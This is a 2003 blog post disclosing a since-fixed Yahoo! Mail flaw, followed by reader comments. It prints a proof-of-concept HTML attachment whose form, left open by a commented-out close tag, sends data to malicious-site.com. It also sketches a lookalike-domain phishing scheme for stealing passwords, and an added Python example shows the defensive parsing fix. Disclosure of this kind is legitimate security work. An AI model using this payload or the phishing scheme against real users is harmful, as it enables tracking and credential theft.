Yahoo! Mail Exploit
I just found an exploit for Yahoo! Mail. First, a little background:
If you receive an email with an HTML attachment, Yahoo! will give you the option to download it, but it will also render it inline, showing you the web page encoded in the attachment. Yahoo! performs a couple of processing steps on the email to try to secure it: first, the text target="_blank" onsubmit="return ShowFormWarning()" is added to the <form> tag. The target specification means that the requested page will show up in its own window and not take over your Yahoo! Mail session. The onsubmit specification causes a pop-up dialog to appear, informing the user that he or she is about to send information to someone other than Yahoo!. Yahoo! will also close the <form> tag if — and this is critical — it doesn’t think it has already been closed. It apparently checks if the form is closed by searching for the text </form> after each instance of <form …>.
So here is the exploit: send an HTML attachment with </form> enclosed in a comment. Consider the following as an example:
<form action="http://www.malicious-site.com/track-email.cgi" method="post">
<input type="hidden" value="Message_ID_123456_was_read_by_Joshua_McGee">
<!-- </form> -->
Here’s how it works: the Yahoo! Mail parser will check the message, find </form>, and assume everything is fine. But now the form is not closed, so all further inputs that might be encountered are treated as belonging to malicious-site.com’s form. This would not be a problem if Yahoo! coded their pages a little better, but two things make it a problem as it currently stands. First, the mail page is bracketed by one big <form> tag to control the “Delete” and “Reply” (etc.) features. Second, the “Delete” button is actually a “Submit” button for this form!
So let’s walk through an example. I send you the malicious code above as an HTML attachment. On the page that displays the email, Yahoo! opens one big <form> to control “Delete” and “Reply” functionality. It renders the malicious code inline, so my code starts an (invisible!) form and inserts an (invisible!) tracking code. I “end” my <form> tag with a </form> tag embedded in a comment. Yahoo! checks to see if I have closed my nested <form>, wrongly determines that I have, and doesn’t add a </form> tag for me. The next <input> encountered is the “Delete” button, which is really a “Submit” button. But since the malicious <form> was never closed, it is a “Submit” button for the malicious <form>. So when the user clicks the “Delete” button, expecting to have the message deleted, it instead sends the tracking ID to the malicious site.
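The parsing mistake described above, as an added example (not Yahoo!'s code and not part of the original post): the substring check the post infers, next to a tokenizer-based check that does not treat comment text as a tag. The function names are hypothetical, and the sample is constructed from the attachment shown above.

```python
import re
from html.parser import HTMLParser

# Constructed sample, modelled on the attachment shown in the post.
ATTACHMENT = (
    '<form action="http://www.malicious-site.com/track-email.cgi" method="post">\n'
    '<input type="hidden" value="Message_ID_123456_was_read_by_Joshua_McGee">\n'
    '<!-- </form> -->\n'
)

def naive_forms_closed(html):
    """The inferred check: a literal </form> appears after each <form ...>."""
    lowered = html.lower()
    for m in re.finditer(r'<form\b[^>]*>', lowered):
        if '</form>' not in lowered[m.end():]:
            return False
    return True

class _FormDepth(HTMLParser):
    """Tracks open forms as an HTML tokenizer sees them; comments are not tags."""
    def __init__(self):
        super().__init__()
        self.depth = 0

    def handle_starttag(self, tag, attrs):
        if tag == 'form':
            self.depth += 1

    def handle_endtag(self, tag):
        if tag == 'form' and self.depth > 0:
            self.depth -= 1

def unclosed_forms(html):
    """Number of <form> elements still open at the end of the fragment."""
    parser = _FormDepth()
    parser.feed(html)
    parser.close()
    return parser.depth

def close_open_forms(html):
    """Append one real </form> per form the tokenizer still considers open."""
    return html + '</form>' * unclosed_forms(html)

if __name__ == '__main__':
    print('naive check says closed:', naive_forms_closed(ATTACHMENT))
    print('forms actually left open:', unclosed_forms(ATTACHMENT))
```

A sanitizer built on this idea would normally re-serialize the attachment from the parsed tokens rather than append text to the raw input, so that its view of the markup and the browser's cannot diverge.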
“Now wait,” you’re thinking, if you are not totally lost already. “This will trigger the ShowFormWarning() function.” True. But what’s the naïve user to think? They are clicking a Yahoo! button, so how could it not be safe? My guess is many users would just ignore the message.
I’m sure you could do more clever things: it might be possible to use JavaScript to populate the invisible form with system data, for instance. Or maybe the target URL is a clone of the “Your session has expired, login again” screen. You could even set the form action URL to something like http://login.yahoo10.com/config/mail?.intl=us&.lg=us, assuming you owned yahoo10.com (it’s available.) When the form data is submitted, then, a Yahoo!-looking window would pop up with a Yahoo!-looking URL asking for the user’s password. Don’t you figure most people would enter it? The malicious site now has your email address and password. Then all the site would have to do, so as not to arouse suspicion, is bring up a Yahoo!-looking page that says “Invalid password”, but on this one have the form correctly set to send the data to Yahoo!. Voilà.
I’ve reported this bug to Yahoo!.

June 21st, 2006 at 09h55
Hi,
Did Yahoo correct this bug or not, or is it still working?
July 5th, 2006 at 03h50
Yup, Yahoo corrected that error
July 5th, 2006 at 08h49
hit me up i have an assignment 4 u
July 21st, 2006 at 01h37
i need a magic box can sum one tell me how to get it
July 21st, 2006 at 07h13
Prayer?
November 8th, 2007 at 12h10
why guys just copy stuff from different websites and pretend as if you have done those things. Shame on you.
November 8th, 2007 at 12h13
Wow, it’s you!
Um, who the hell are you?
If you’re responding to the original post, yes, I found this exploit myself. Yahoo! wouldn’t respond, so I decided to go public with it. Seemed a prudent course of action at the time.
November 8th, 2007 at 16h32
OK, esprit de l’escalier time:
1. See the title bar at the top of this window, and the nicely-rendered HTML text? This is a website. Where you learn stuff. Take a moment to get to know each other.
2. I’m not really going to lose much sleep if you’re too dumb to figure out security holes on your own.
December 9th, 2007 at 13h39
ok my brother
October 24th, 2008 at 12h05
[...] Yahoo Mail vulnerability using commented </form>:http://www.mcgees.org/2003/07/24/yahoo-mail-exploit/§Yamanner countermeasures [...]
March 2nd, 2009 at 18h15
can anyone tell me a good section to go for, for options?
June 20th, 2009 at 13h02
[...] instead of getting the exploit patched by not doing shit. And give credit where credit is due http://www.mcgees.org/2003/07/24/yahoo-mail-exploit/ Quote:I’ve reported this bug to Yahoo!. Thu, 24 Jul 2003 12:57:09 -0500 Thats from the link [...]